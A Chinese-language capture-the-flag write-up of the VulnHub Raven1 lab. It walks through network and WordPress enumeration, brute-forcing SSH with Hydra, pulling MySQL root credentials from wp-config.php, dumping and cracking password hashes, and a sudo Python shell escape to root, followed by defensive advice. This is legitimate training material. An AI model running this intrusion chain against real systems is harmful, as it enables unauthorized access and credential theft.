Vulnhub靶场——Raven1练习
字数 1178 2025-08-19 12:41:48

Raven1 靶场渗透测试教学文档

靶机概述

Raven1 是 VulnHub 上的一个渗透测试靶机,适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag,需要通过系统性的渗透测试方法逐步获取。

环境准备

  • 靶机下载地址:VulnHub Raven1
  • 攻击机:Kali Linux
  • 网络配置:确保靶机和攻击机在同一网络段

信息收集阶段

1. 网络扫描

使用 arp-scan 发现目标 IP:

arp-scan -l

发现目标 IP 为 192.168.78.144

2. 端口扫描

使用 Nmap 进行全端口扫描:

nmap -sT -T4 -Pn 192.168.78.144

扫描结果:

  • 开放端口:22(SSH)、80(HTTP)、111(RPC)

3. Web 服务枚举

访问 HTTP 服务:

http://192.168.78.144

/server.html 页面源代码中发现第一个 flag:

f1ag1{b9bbcb33e11b80be759c4e844862482d}

4. 目录扫描

使用 dirsearch 扫描 Web 目录:

dirsearch -u http://192.168.78.144

发现 WordPress 目录:/wordpress

5. WordPress 扫描

使用 WPScan 扫描 WordPress:

wpscan --url http://192.168.78.144/wordpress -eu

发现两个用户名:

  • steven
  • michael

漏洞利用阶段

1. SSH 爆破

创建用户名字典 user.txt

steven
michael

使用 Hydra 爆破 SSH:

hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.78.144 ssh

成功爆破出密码:

  • 用户名:michael
  • 密码:michael

2. 获取系统 flag

通过 SSH 登录:

ssh michael@192.168.78.144

查找 flag 文件:

find / -name flag*

发现第二个 flag:

/var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

3. 数据库信息获取

查看 WordPress 配置文件:

cat /var/www/html/wordpress/wp-config.php

发现 MySQL 凭据:

  • 用户名:root
  • 密码:R@v3nSecurity

4. 数据库查询

登录 MySQL:

mysql -u root -pR@v3nSecurity

查询 WordPress 数据库:

use wordpress;
select * from wp_posts;

发现两个 flag:

flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}

查询用户表:

select * from wp_users;

获取用户密码哈希(需要解密)

权限提升阶段

1. 解密用户密码

使用在线工具或 John the Ripper 解密 steven 的密码哈希,得到明文密码:

pink84

2. 切换用户

切换到 steven 用户:

su steven
密码:pink84

3. 检查 sudo 权限

sudo -l

发现 steven 可以以 root 权限执行 Python

4. 利用 Python 提权

sudo python -c 'import os; os.system("/bin/sh")'

成功获取 root shell

总结

通过本次渗透测试,我们:

  1. 通过信息收集发现 WordPress 和用户信息
  2. 爆破 SSH 获取初始立足点
  3. 从 WordPress 配置文件中获取数据库凭据
  4. 查询数据库获取更多 flag 和用户凭据
  5. 通过 sudo 权限滥用实现权限提升

关键点备忘

  1. 不要忽略页面源代码中的隐藏信息
  2. 配置文件往往包含敏感信息
  3. 数据库是获取凭证的重要来源
  4. 定期检查 sudo 权限是提权的关键
  5. 密码复用是常见的安全问题

防御建议

  1. 使用强密码策略
  2. 限制 SSH 登录尝试
  3. 保护配置文件权限
  4. 定期审计 sudo 权限
  5. 避免密码复用
Raven1 靶场渗透测试教学文档 靶机概述 Raven1 是 VulnHub 上的一个渗透测试靶机,适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag,需要通过系统性的渗透测试方法逐步获取。 环境准备 靶机下载地址:VulnHub Raven1 攻击机:Kali Linux 网络配置:确保靶机和攻击机在同一网络段 信息收集阶段 1. 网络扫描 使用 arp-scan 发现目标 IP: 发现目标 IP 为 192.168.78.144 2. 端口扫描 使用 Nmap 进行全端口扫描: 扫描结果: 开放端口:22(SSH)、80(HTTP)、111(RPC) 3. Web 服务枚举 访问 HTTP 服务: 在 /server.html 页面源代码中发现第一个 flag: 4. 目录扫描 使用 dirsearch 扫描 Web 目录: 发现 WordPress 目录: /wordpress 5. WordPress 扫描 使用 WPScan 扫描 WordPress: 发现两个用户名: steven michael 漏洞利用阶段 1. SSH 爆破 创建用户名字典 user.txt : 使用 Hydra 爆破 SSH: 成功爆破出密码: 用户名:michael 密码:michael 2. 获取系统 flag 通过 SSH 登录: 查找 flag 文件: 发现第二个 flag: 3. 数据库信息获取 查看 WordPress 配置文件: 发现 MySQL 凭据: 用户名:root 密码:R@v3nSecurity 4. 数据库查询 登录 MySQL: 查询 WordPress 数据库: 发现两个 flag: 查询用户表: 获取用户密码哈希(需要解密) 权限提升阶段 1. 解密用户密码 使用在线工具或 John the Ripper 解密 steven 的密码哈希,得到明文密码: 2. 切换用户 切换到 steven 用户: 3. 检查 sudo 权限 发现 steven 可以以 root 权限执行 Python 4. 利用 Python 提权 成功获取 root shell 总结 通过本次渗透测试,我们: 通过信息收集发现 WordPress 和用户信息 爆破 SSH 获取初始立足点 从 WordPress 配置文件中获取数据库凭据 查询数据库获取更多 flag 和用户凭据 通过 sudo 权限滥用实现权限提升 关键点备忘 不要忽略页面源代码中的隐藏信息 配置文件往往包含敏感信息 数据库是获取凭证的重要来源 定期检查 sudo 权限是提权的关键 密码复用是常见的安全问题 防御建议 使用强密码策略 限制 SSH 登录尝试 保护配置文件权限 定期审计 sudo 权限 避免密码复用